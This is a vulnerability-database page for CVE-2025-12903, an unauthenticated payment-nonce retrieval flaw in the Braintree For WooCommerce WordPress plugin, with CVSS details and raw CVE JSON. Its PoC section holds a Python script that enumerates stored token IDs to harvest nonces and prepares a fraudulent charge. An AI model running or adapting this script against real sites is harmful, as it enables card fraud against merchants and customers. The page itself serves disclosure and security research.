Security Vulnerability Report
中文
CVE-2025-12903 CVSS 7.5 HIGH

CVE-2025-12903

Published: 2025-11-12 09:15:41
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Payment Plugins Braintree For WooCommerce plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the wc-braintree/v1/3ds/vaulted_nonce REST API endpoint in all versions up to, and including, 3.2.78. This is due to the endpoint being registered with permission_callback set to __return_true and processing user-supplied token IDs without verifying ownership or authentication. This makes it possible for unauthenticated attackers to retrieve payment method nonces for any stored payment token in the system, which can be used to create fraudulent transactions, charge customer credit cards, or attach payment methods to other subscriptions.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Payment Plugins Braintree For WooCommerce < 3.2.79

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-12903 PoC - Unauthorized payment nonce retrieval # Target: WordPress site with Payment Plugins Braintree For WooCommerce < 3.2.79 TARGET_URL = "https://target-wordpress-site.com" API_ENDPOINT = "/wp-json/wc-braintree/v1/3ds/vaulted_nonce" def exploit_vulnerability(): """ Exploit authorization bypass in vaulted_nonce endpoint. Attackers can retrieve payment method nonces for any stored token ID. """ # Iterate through token IDs to retrieve payment nonces for token_id in range(1, 100): url = f"{TARGET_URL}{API_ENDPOINT}" params = {"token_id": str(token_id)} # No authentication required - permission_callback is __return_true response = requests.get(url, params=params) if response.status_code == 200: data = response.json() if "nonce" in data: print(f"[!] Found valid nonce for token_id {token_id}") print(f" Nonce: {data['nonce']}") print(f" This nonce can be used for fraudulent transactions") return data elif response.status_code == 404: continue print("[*] No valid nonces found in range") return None def create_fraudulent_transaction(nonce): """ Simulate fraudulent transaction creation using obtained nonce. In real attack, this would be sent to Braintree API. """ transaction_data = { "paymentMethodNonce": nonce, "amount": "99.99", "description": "Fraudulent charge" } print(f"[*] Fraudulent transaction data prepared: {json.dumps(transaction_data, indent=2)}") return transaction_data if __name__ == "__main__": print("[*] CVE-2025-12903 PoC - Braintree WooCommerce Authorization Bypass") print("[*] Target: Payment Plugins Braintree For WooCommerce < 3.2.79\n") result = exploit_vulnerability() if result: create_fraudulent_transaction(result.get("nonce"))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12903", "sourceIdentifier": "[email protected]", "published": "2025-11-12T09:15:40.800", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Payment Plugins Braintree For WooCommerce plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the wc-braintree/v1/3ds/vaulted_nonce REST API endpoint in all versions up to, and including, 3.2.78. This is due to the endpoint being registered with permission_callback set to __return_true and processing user-supplied token IDs without verifying ownership or authentication. This makes it possible for unauthenticated attackers to retrieve payment method nonces for any stored payment token in the system, which can be used to create fraudulent transactions, charge customer credit cards, or attach payment methods to other subscriptions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://developer.wordpress.org/rest-api/using-the-rest-api/authentication/", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woo-payment-gateway/tags/3.2.78/includes/api/class-wc-braintree-controller-3ds.php#L23", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woo-payment-gateway/tags/3.2.78/includes/api/class-wc-braintree-controller-3ds.php#L35", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woo-payment-gateway/tags/3.2.78/includes/api/class-wc-braintree-controller-3ds.php#L41", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3392259%40woo-payment-gateway&new=3392259%40woo-payment-gateway&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/89cd5429-39a0-441f-ba69-dea111eae5ed?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.